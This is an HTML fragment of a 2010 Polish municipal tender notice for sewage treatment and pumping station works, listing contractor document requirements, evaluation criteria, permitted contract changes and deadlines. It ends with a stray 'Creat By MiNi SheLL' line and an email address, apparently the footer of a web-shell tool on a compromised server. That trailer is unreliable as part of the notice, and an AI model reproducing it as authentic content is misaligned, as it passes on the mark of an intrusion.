<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)  kosztorys ofertowy  dla zakresu  1 - 12. 

         2) opis techniczny - wykonawca do oferty dołączy szczegółową charakterystykę i opis proponowanego wyposażenia i urządzeń ( nazwy, producenta,  parametry i dane  techniczne )  wyszczególnionych w przedmiarze robót  dla zakresu 10 - Technologia na terenie oczyszczalni oraz centralna przepompownia ścieków:
               - pkt 1.16  sprzętu ochrony dla obsługi oczyszczalni i przepompowni ścieków,                - pkt 1.17  sprzętu do pomiaru i sterowania 

         3)  opis techniczny - charakterystyka i opis układu sterowania dla 13 lokalnych przepompowni - zakres  13</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, jeżeli zajdzie którykolwiek z niżej wymienionych warunków;

1) zajdzie konieczność wprowadzenia istotnych zmian w dokumentacji projektowej, sposobie lub technologii wykonania przedmiotu umowy; rezygnacji z wykonania części prac, 

2) nastąpi zmiana obowiązującej stawki VAT;

       3)  przy zawieraniu umowy nie można było przewidzieć rozmiaru lub kosztów prac;

       4) zajdzie konieczność zmiany terminu wykonania przedmiotu zamówienia na skutek:

              a) warunków atmosferycznych uniemożliwiających ze względów technologicznych wykonanie  przedmiotu umowy w ustalonym terminie lub negatywnie wpływających na jakość wykonania lub trwałość przedmiotu zamówienia;

              b) wystąpienia konieczności wykonania robót dodatkowych; ewentualnych kolizji z zakrytymi  urządzeniami, zmiany technologii wykonania robót budowlanych; 

              c) przedłużającego się oczekiwania na ewentualne uzgodnienia, decyzje administracyjne itp.

              d) działania siły wyższej.

5) wystąpienia konieczności, że na wskutek okoliczności niezależnych od wykonawcy i zamawiającego,  należy dokonać zmiany osób ( upoważnionych do występowania w imieniu Wykonawcy lub  Zamawiającego ) przy pomocy których Wykonawca lub  Zamawiający realizuje przedmiot umowy;

6) na wskutek okoliczności niezależnych od wykonawcy   należy dokonać zmiany kierownika budowy lub kierowników robót( ustanie stosunku pracy lub inne losowe zdarzenie niezależne od wykonawcy),  pod warunkiem spełnienia wymaganego warunku przez nowo wskazaną osobę;

 7) za zgodą zamawiającego powierzenie podwykonawcom innej części zamówienia niż wykazane w  ofercie lub zmiana podwykonawcy w trakcie trwania robót budowlanych;</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.janowiec.wlkp.bip.net.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Janowcu Wielkopolskim; ul. Gnieźnieńska 3; 88-430  Janowiec Wielkopolski - pokój nr 1;.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.06.2010 godzina 10:00, miejsce: Urząd Miejski w Janowcu Wielkopolskim; ul. Gnieźnieńska 3; 88-430  Janowiec Wielkopolski - sekretariat - pokój nr 6;.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt jest finansowany ze środków Unii Europejskiej w ramach działania Podstawowe usługi gospodarki i ludności wiejskiej objetego Programem Rozwoju Obszarów Wiejskich na lata 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com